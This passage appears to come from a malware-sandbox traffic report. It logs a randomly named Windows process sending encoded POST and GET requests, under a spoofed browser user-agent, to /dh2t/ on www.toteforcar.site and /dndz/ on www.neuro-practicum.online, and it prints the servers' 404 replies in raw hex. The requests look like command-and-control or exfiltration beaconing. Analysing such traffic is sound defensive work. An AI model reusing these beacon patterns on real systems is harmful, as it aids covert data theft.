Oct 7, 2024 11:54:05.338669062 CEST	1289	IN	Data Raw: 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 73 75 63 63 65 73 73 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 61 62 61 34 37 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 35 61 62 61 Data Ascii: ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707070;letter-spacing: -0.01em;font-size: 1.25
Oct 7, 2024 11:54:05.338768959 CEST	592	IN	Data Raw: 37 20 30 2d 35 38 2e 30 30 32 2d 36 30 2e 31 36 35 2d 31 30 32 2d 31 31 36 2e 35 33 31 2d 31 30 32 7a 4d 32 35 36 20 33 33 38 63 2d 32 35 2e 33 36 35 20 30 2d 34 36 20 32 30 2e 36 33 35 2d 34 36 20 34 36 20 30 20 32 35 2e 33 36 34 20 32 30 2e 36 Data Ascii: 7 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.11.30	49810	185.104.28.27	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:54:11.201009989 CEST	665	OUT	POST /dh2t/ HTTP/1.1 Host: www.toteforcar.site Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.toteforcar.site Referer: http://www.toteforcar.site/dh2t/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 44 73 68 63 6a 52 75 6f 41 73 30 56 54 4f 2f 49 79 52 61 75 52 62 33 42 62 6f 59 4c 67 76 4b 37 73 76 53 34 78 6f 31 4e 2f 39 6a 77 6d 48 70 57 45 78 4a 41 31 67 42 70 33 38 30 52 64 5a 69 73 4e 42 53 49 2f 30 54 67 72 69 31 5a 71 31 4a 38 4a 6a 52 61 4c 69 55 48 6a 46 4b 52 56 2b 55 68 41 76 75 30 32 72 71 56 66 2f 71 62 74 67 2b 43 44 45 44 76 47 38 48 62 6f 61 68 35 5a 61 66 4e 39 59 77 65 62 52 79 5a 7a 78 58 63 59 4b 6f 75 79 7a 67 64 56 32 48 39 67 50 42 4e 41 32 70 50 69 43 63 41 39 32 2b 6e 39 61 4f 7a 43 41 63 56 56 31 4f 6a 49 7a 38 61 67 51 58 31 71 48 72 55 73 41 3d 3d Data Ascii: VzK4o8Jx=DshcjRuoAs0VTO/IyRauRb3BboYLgvK7svS4xo1N/9jwmHpWExJA1gBp380RdZisNBSI/0Tgri1Zq1J8JjRaLiUHjFKRV+UhAvu02rqVf/qbtg+CDEDvG8Hboah5ZafN9YwebRyZzxXcYKouyzgdV2H9gPBNA2pPiCcA92+n9aOzCAcVV1OjIz8agQX1qHrUsA==
Oct 7, 2024 11:54:11.372750998 CEST	382	IN	HTTP/1.1 404 Not Found Date: Mon, 07 Oct 2024 09:54:11 GMT Server: Apache/2.4.6 (CentOS) Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 68 32 74 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dh2t/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.11.30	49811	185.104.28.27	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:54:13.912760973 CEST	685	OUT	POST /dh2t/ HTTP/1.1 Host: www.toteforcar.site Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.toteforcar.site Referer: http://www.toteforcar.site/dh2t/ Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 44 73 68 63 6a 52 75 6f 41 73 30 56 53 75 50 49 77 77 61 75 58 37 33 47 65 6f 59 4c 36 66 4b 2f 73 76 65 34 78 71 5a 6b 2f 4f 4c 77 6e 6d 35 57 48 31 64 41 79 67 42 70 76 73 31 56 44 70 69 33 4e 42 58 39 2f 32 48 67 72 6b 5a 5a 71 77 4e 38 4a 54 74 46 4c 79 55 42 73 6c 4b 70 62 65 55 68 41 76 75 30 32 72 50 2b 66 2f 79 62 74 55 43 43 43 68 2f 6f 59 73 48 63 38 4b 68 35 64 61 66 42 39 59 78 4e 62 51 66 43 7a 7a 66 63 59 4f 67 75 7a 68 59 63 4f 6d 47 32 2b 2f 41 6e 4e 54 63 46 69 77 30 53 30 46 6d 41 34 71 65 32 48 58 74 50 49 32 36 68 62 54 41 33 38 52 36 64 6f 46 71 50 78 4b 6f 51 36 72 58 68 51 55 6a 37 70 41 59 35 37 71 4d 4c 65 31 63 3d Data Ascii: VzK4o8Jx=DshcjRuoAs0VSuPIwwauX73GeoYL6fK/sve4xqZk/OLwnm5WH1dAygBpvs1VDpi3NBX9/2HgrkZZqwN8JTtFLyUBslKpbeUhAvu02rP+f/ybtUCCCh/oYsHc8Kh5dafB9YxNbQfCzzfcYOguzhYcOmG2+/AnNTcFiw0S0FmA4qe2HXtPI26hbTA38R6doFqPxKoQ6rXhQUj7pAY57qMLe1c=
Oct 7, 2024 11:54:14.083508968 CEST	382	IN	HTTP/1.1 404 Not Found Date: Mon, 07 Oct 2024 09:54:13 GMT Server: Apache/2.4.6 (CentOS) Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 68 32 74 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dh2t/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.11.30	49812	185.104.28.27	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:54:16.619117022 CEST	2578	OUT	POST /dh2t/ HTTP/1.1 Host: www.toteforcar.site Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.toteforcar.site Referer: http://www.toteforcar.site/dh2t/ Connection: close Content-Length: 3341 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 44 73 68 63 6a 52 75 6f 41 73 30 56 53 75 50 49 77 77 61 75 58 37 33 47 65 6f 59 4c 36 66 4b 2f 73 76 65 34 78 71 5a 6b 2f 49 54 77 6e 55 68 57 46 53 78 41 7a 67 42 70 78 38 31 57 44 70 69 36 4e 46 7a 78 2f 32 62 61 72 68 46 5a 34 47 78 38 65 51 31 46 46 79 55 42 30 56 4b 53 56 2b 56 6c 41 72 43 77 32 72 66 2b 66 2f 79 62 74 56 53 43 46 30 44 6f 66 63 48 62 6f 61 68 6c 5a 61 65 6f 39 59 70 64 62 51 62 53 7a 78 2f 63 59 39 6f 75 7a 55 4d 63 4f 6d 47 32 77 66 41 69 4e 54 59 49 69 78 63 47 30 45 76 31 34 5a 53 32 4c 53 73 37 50 47 32 6e 49 69 6b 68 68 67 47 34 2b 55 53 7a 79 49 77 44 2b 5a 62 68 66 47 4c 37 74 41 45 64 6f 62 45 7a 46 51 71 41 51 49 75 61 33 55 74 36 57 38 70 42 33 4c 78 67 54 51 45 64 43 70 38 72 55 75 4f 2b 4a 56 64 6c 71 6d 58 4b 79 41 65 52 2b 4e 58 4f 65 46 58 32 74 39 32 30 65 35 61 6f 57 4b 6e 63 2b 41 49 59 31 6b 49 42 37 30 4e 38 74 38 78 56 6f 72 6c 44 41 71 62 50 6b 42 6f 51 39 64 74 64 46 5a 51 53 75 79 34 61 63 37 6e 75 4c 32 4c 37 54 6f 66 77 71 [TRUNCATED] Data Ascii: VzK4o8Jx=DshcjRuoAs0VSuPIwwauX73GeoYL6fK/sve4xqZk/ITwnUhWFSxAzgBpx81WDpi6NFzx/2barhFZ4Gx8eQ1FFyUB0VKSV+VlArCw2rf+f/ybtVSCF0DofcHboahlZaeo9YpdbQbSzx/cY9ouzUMcOmG2wfAiNTYIixcG0Ev14ZS2LSs7PG2nIikhhgG4+USzyIwD+ZbhfGL7tAEdobEzFQqAQIua3Ut6W8pB3LxgTQEdCp8rUuO+JVdlqmXKyAeR+NXOeFX2t920e5aoWKnc+AIY1kIB70N8t8xVorlDAqbPkBoQ9dtdFZQSuy4ac7nuL2L7TofwqSwHkywzHOd7w4hamWDyLaGX6t5Zs7T3qOop8CGTEKCujHT9/Q+HjSoElI4xguF3QDAyRRWAcMTMapen2fV9Qo+BJ80k4YPh06tV9Z5GWVz2udVQzk7x/D1+U2QTk/A/1ZE/ZtJ5TdGuZQPlZ1YocNlcQMN1ckuNfh3yB4NEp3ofnudsurXXDVOaeLyQ4NqBO5aNNMF6eTsLyMVCSHur/CCkPomHxeK+gyPEFkxmOBhaz0fugUtnoEqLOyxd5p2FFqR00dPccKeB5oBSHpsMcpUAlSKAY6QgYvLjCmaEexrYpGfxVppKhSppGG0flctZIRe6/3fLn+lJ4gMobdcPRovk71exrTiCr7De5DBqB/56Xjdn9nmFdSa37vfmg4B6yKDfa7+kJH0UGiI4lfn/7jOSEYziwYssGm5JRY28CPKCd73B4AhOeWbt3LKlEW/2BwZxL84jn1X06QBXZpxrJiiPdSVF01aWiUaOUsbJIiqx/Jx+qKHuJDjgZLwSyJa65S38JCxhvFGxlD1MeYylW2jUo0jx9hsVOvBeGkH0j9TydJeMylCD7Z2pBX4FqulLCEqMlf8oAfG05Xyo2j1usm0ZeA4D7iKY3T7WEHcpdA7b7VAijCJBC9+IHEsFloJxKpKhBYIMeWgn/jewlZD92nnJFk+miMgDm+e [TRUNCATED]
Oct 7, 2024 11:54:16.619154930 CEST	1224	OUT	Data Raw: 6e 6f 46 54 38 35 63 34 4b 78 31 62 61 7a 47 44 59 57 39 63 67 53 71 79 53 6c 6d 4a 44 45 63 74 70 74 5a 57 6f 55 58 5a 56 4c 4f 34 58 78 51 4a 69 44 63 73 58 68 4b 35 41 6d 4a 51 4e 6e 7a 59 63 45 33 4c 64 31 63 63 34 6d 63 79 72 35 58 58 66 6b Data Ascii: noFT85c4Kx1bazGDYW9cgSqySlmJDEctptZWoUXZVLO4XxQJiDcsXhK5AmJQNnzYcE3Ld1cc4mcyr5XXfk8Rs5vS7IyhqBZCVgI2hBr6zb5sFDz9UyAwvBu4P2Do87nCyptCS3mldOP/x5m48boNsvz3xJ4dP8lN1Rs2vcLkfw4fKONn/IhbO10Tpanly+JgpUYHKukmuWS/fxw3OieQ9VL3QIOyM5bLnyu8pqecrQkh5ZybwQL
Oct 7, 2024 11:54:16.790271997 CEST	382	IN	HTTP/1.1 404 Not Found Date: Mon, 07 Oct 2024 09:54:16 GMT Server: Apache/2.4.6 (CentOS) Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 68 32 74 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dh2t/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.11.30	49813	185.104.28.27	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:54:19.331899881 CEST	392	OUT	GET /dh2t/?VzK4o8Jx=OuJ8gnv9Mf0seMPZwgWqdoiXcL8RlvinjfaO7Y1P7N6K2HIOPUsL5gVusZwNUZykZEqB/DbtgQZV6EtzKFIFDF8htWObdeNACruwjJyoWYmCvw6DdWzPF9Q=&0zu8A=o2yln6 HTTP/1.1 Host: www.toteforcar.site Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Oct 7, 2024 11:54:19.502284050 CEST	382	IN	HTTP/1.1 404 Not Found Date: Mon, 07 Oct 2024 09:54:19 GMT Server: Apache/2.4.6 (CentOS) Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 68 32 74 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dh2t/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.11.30	49814	37.140.192.23	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:54:25.080765963 CEST	686	OUT	POST /dndz/ HTTP/1.1 Host: www.neuro-practicum.online Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.neuro-practicum.online Referer: http://www.neuro-practicum.online/dndz/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 2f 42 78 36 72 61 4d 2f 4c 6a 31 54 69 70 48 4e 77 4c 54 53 49 74 55 6f 44 78 7a 72 45 62 49 56 46 56 49 4c 72 6a 65 4a 6c 57 6b 70 61 38 47 32 43 6d 37 64 48 68 46 35 6a 76 41 35 38 52 50 47 51 71 75 69 37 78 61 68 52 6f 64 62 61 31 65 4b 6b 4f 44 30 76 45 59 75 52 46 30 72 4a 50 4f 38 74 39 55 4e 56 6b 6c 55 78 6a 76 41 58 6f 33 62 42 4c 66 6b 70 32 67 31 53 36 75 77 39 62 44 50 44 4c 6c 51 33 31 6a 64 59 59 30 44 48 70 61 39 55 75 31 32 42 72 32 4a 76 41 39 4b 46 66 79 62 6d 33 65 4a 74 47 74 37 35 66 67 38 6d 4f 58 2f 41 45 2b 55 4e 74 77 48 77 39 31 73 54 66 67 78 64 51 3d 3d Data Ascii: VzK4o8Jx=/Bx6raM/Lj1TipHNwLTSItUoDxzrEbIVFVILrjeJlWkpa8G2Cm7dHhF5jvA58RPGQqui7xahRodba1eKkOD0vEYuRF0rJPO8t9UNVklUxjvAXo3bBLfkp2g1S6uw9bDPDLlQ31jdYY0DHpa9Uu12Br2JvA9KFfybm3eJtGt75fg8mOX/AE+UNtwHw91sTfgxdQ==
Oct 7, 2024 11:54:25.330358028 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 07 Oct 2024 09:54:25 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 a2 ca 2f 5d 3f b0 9c 1b de 33 e1 df e6 6c 65 38 c6 8d e9 75 01 ba 69 cc df be 59 99 81 d1 99 2d 0d cf 37 03 bd fb ef bf 7e 3f 18 75 c3 bb 8e b1 32 f5 ee ad 65 de ad 5d 2f 00 fc ae 13 98 0e 94 ba b3 e6 c1 52 9f 9b b7 d6 cc 1c 90 1f 9c e5 58 81 65 d8 03 7f 66 d8 a6 2e 66 41 78 ee b5 1b f8 29 00 8e 6b 39 73 f3 23 94 0a ac c0 36 df fe f3 ff f8 9f ff db ff fc 5f ff f9 5f ff fc 7f ff f9 7f ff cf ff fd 9f ff d5 81 8b ff 71 ea 5c fb eb 29 5c fd d7 3f ff 9f 7f fe 5f ff fc 1f 78 f5 e6 8c [TRUNCATED] Data Ascii: c000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrv/]?3le8uiY-7~?u2e]/RXef.fAx)k9s#6__q\)\?_xVxYsmw}sw?t;;kM??c@7y!^AR}oqg\|Z\]Gxvw}Xtxnf;t=q?Y)~gu&3)Q,,i,lm0'p#tn,g"LME2%(#`f`OL~r{p\|~k16fn<w'X,;c=XBll<6<[:z\|J;/\+\|,t KIY?!P]A3>\eyGF<v4je:ss520fX&B;5n29MQrvIEtjj\{[v4&nGJsk6L_QY\|MG/W?wNA-oZUoN5RJV&S'"_c\|ee5MULz$zj@D9Ah~FY`pW?c:`i$eCh;XT4V"xhauw9p( [TRUNCATED]
Oct 7, 2024 11:54:25.330476046 CEST	1289	IN	Data Raw: 01 e1 ca 00 c1 53 81 df 45 78 0c 3e 36 43 62 9b ae 33 10 55 0a ba 31 b9 6c 50 8b 44 26 c3 31 67 84 26 70 12 bb 30 34 fe fe 65 21 2d 94 c5 98 99 d2 12 1c 54 ec f6 25 b2 12 60 09 7d c4 ff 03 05 ee 1a c1 04 65 93 5a ca 43 41 e8 20 99 67 b2 d0 c6 64 Data Ascii: SEx>6Cb3U1lPD&1g&p04e!-T%`}eZCA gd-DDuO~x`n\ @V?,Q{AOtGr*[zoxm _dlO#e);N"RQI=2i7&m'w+P6T]+v\|Z
Oct 7, 2024 11:54:25.330827951 CEST	1289	IN	Data Raw: e6 1f d4 90 ce 70 e3 19 8c e8 08 ff 73 1b d0 0d 7b 23 69 fe 41 0d e7 0c 37 9e de 68 8e d1 3f af c1 dc b0 2f e2 c6 1f d2 50 ce b2 e2 e9 8d 64 c0 9f 18 c8 51 09 72 1c f1 ca 72 f0 6c 6f 74 36 7a b1 58 e4 9e 83 19 ed c6 47 a7 af 87 33 61 56 5a e2 6a Data Ascii: ps{#iA7h?/PdQrrlot6zXG3aVZjnx3c\A34Bc@dWm.9Y:`w(}.:6p];)q\<_MYk@ZeNzhImQDny?o/5IQf:^A1-f@\=Ics1OA
Oct 7, 2024 11:54:25.331057072 CEST	1289	IN	Data Raw: 81 5d 88 02 51 cf e8 3d ec 24 8e cd 71 48 93 f4 4c 3e c3 4e 4a 9a b9 0b 05 8a 9e dc 53 28 25 88 dd 49 d8 c9 0f 26 ff 20 cd 86 e7 75 0d 0a 2d 79 36 af 60 27 67 19 ed f0 34 45 cf e5 0b ec a4 a5 a1 1b 50 a4 e9 f9 3c 80 dd 8a 9b d1 f8 cf 10 f5 5c 76 Data Ascii: ]Q=$qHL>NJS(%I& u-y6`'g4EP<\voWyl"oLzN=a3<c3}4=sy~.@/&NL4IdI_MRM`2nocZl&N2iIKCH7I!
Oct 7, 2024 11:54:25.331341982 CEST	1289	IN	Data Raw: 77 3d 98 19 5e 39 cb bf ab aa 16 2c 37 ab 6b bf 5a 1e fe b4 a3 e2 66 5d 5a ed 5d 55 b5 cd 1a 67 85 d2 3a df 57 d5 f9 dd 05 ef ad a4 86 28 74 3f d7 b9 b7 f6 ef b3 b1 5c cb e7 ef dc ef 2f db 68 25 f6 6a 76 9a cb ce 62 29 17 3b 3d 67 09 f9 79 cd 72 Data Ascii: w=^9,7kZf]Z]Ug:W(t?\/h%jvb);=gyr,?4IqX4gQp~7'X5W[a(cQZV%/qT>)64lrY33z{BCf=PO169`\|7[Z9m#WWKiXj$e
Oct 7, 2024 11:54:25.331357002 CEST	1289	IN	Data Raw: 56 84 7f 48 73 2d 0d fd 39 cd b5 ca 5e 3a 8c b9 76 bc 4e aa 00 7f 40 73 8d a5 8b 8e 6f ae ad e6 4c e6 5a a6 1f 8f 6a ae 31 76 e9 01 cc 35 96 de 6d 63 b6 00 cf f6 30 d7 8e 4d ff 53 d0 fd c9 98 6b 19 b1 3d 8a b9 c6 d6 5d fb 9b 6b 2c 9d d5 c2 5c ab Data Ascii: VHs-9^:vN@soLZj1v5mc0MSk=]k,\fc!wo7U[k-&]t {nCk62Skt{xTK^oL?^ck,n7MSk=]k,^fc!wo7Uk%F
Oct 7, 2024 11:54:25.331804037 CEST	1289	IN	Data Raw: c8 8a c8 b2 a7 c1 b1 ba 05 b5 28 d7 75 1e 42 38 cc aa 62 82 49 b9 70 16 a9 0a 00 92 82 c0 c6 02 35 f9 de ba b6 76 97 c1 f7 35 ed 2c 44 5f b8 b4 b3 18 36 7e 67 a1 e4 c5 45 fb f6 06 6d cd 43 95 34 30 f5 07 b0 af 84 5b 65 cc 29 e7 45 35 55 c7 1f 1e Data Ascii: (uB8bIp5v5,D_6~gEmC40[e)E5U)\ _]5NY7u>.}@OQTJ/2,O\|tQ&/9!n4-fg_@;*3D.%(-I+^]%zl$Ed_]"c^\+"7m
Oct 7, 2024 11:54:25.331980944 CEST	1289	IN	Data Raw: b2 0a fc 1b f3 1a 88 00 ca 9d 28 d3 1f 40 17 36 9f 1f 82 9c 4a 43 1c b6 a3 21 34 08 86 33 80 50 06 48 37 48 af 40 d8 85 6d 19 83 88 8d f9 91 16 fe 30 40 68 46 28 8a f4 0b 65 15 da 2a cb 28 7a 12 48 35 fc 50 e8 07 11 63 7e 88 4a 41 92 81 0f 02 e1 Data Ascii: (@6JC!43PH7H@m0@hF(e(zH5Pc~JAt%i( N#TfFoO-wJGCIP^SxU2_`MP#Cdi"(?_$nA0BGA%EBUBBp5}cYG]<3:QLA@P1H@M
Oct 7, 2024 11:54:25.332268000 CEST	1289	IN	Data Raw: f8 78 59 ac 15 d2 77 9b af 92 27 5c 22 84 8b a3 9d 94 8f c2 cf 1c e5 72 39 5b 28 75 32 33 e5 6a 1d e5 a3 ca 2e df 41 79 59 97 8f 1a 53 fe ec 7d 5e 23 ec 25 94 ef 16 f6 cf a1 cf 9f 59 da bf 9c 3e 2f ea fd 48 3d df 30 ea 66 55 04 53 14 c3 75 43 01 Data Ascii: xYw'\"r9[(u23j.AyYS}^#%Y>/H=0fUSuC,@GrMI1``_E)HD ~"#@r$#@xHZ.=4x"HJawUV^ $V%U%7Kev^t)]k7B9atl%f43%MgYFY
Oct 7, 2024 11:54:25.332350016 CEST	1289	IN	Data Raw: d0 00 fa 19 c9 75 51 ac e5 44 aa b5 7d 85 3a d7 e9 79 7b a7 54 a4 35 56 89 2e 13 e8 a7 93 e7 d0 96 13 15 41 21 47 f6 2b 04 7a d4 46 a0 87 c7 17 68 79 4c 25 1a 9c 36 90 2e 22 2e d0 5c 62 e1 8c 46 44 99 c3 dd 50 95 c7 9a 3c a5 c8 f7 94 f4 50 89 27 Data Ascii: uQD}:y{T5V.A!G+zFhyL%6.".\bFDP<P'^#Z+\ye1.1udQ{282Onp.1/E-a^'e$a!LX^JxKE@mWG *PKjb(KZ1x)?m82
Oct 7, 2024 11:54:25.544636965 CEST	1289	IN	Data Raw: e9 dd 72 01 0e a7 0c a1 08 24 27 c2 79 20 69 19 0e 81 94 b6 25 2f c5 79 38 19 31 0e 01 e5 e4 2f a6 2a 27 c9 45 ba d2 a2 1c c2 ca c9 4e 08 ab 20 cc 79 58 59 69 0e 61 c9 a5 14 e6 c5 30 0f 2a 23 85 d1 14 3d 2a 83 54 14 e9 3c ac 9c 4c 87 d0 86 a5 fc Data Ascii: r$'y i%/y81/'EN yXYia0#=T<LJuRJC(Rr2@yCHwmsQx\IFI\gTgB+#!'y"LR,S("edJ(Y(9p"XZ9aH* /Y%070z#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.11.30	49815	37.140.192.23	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
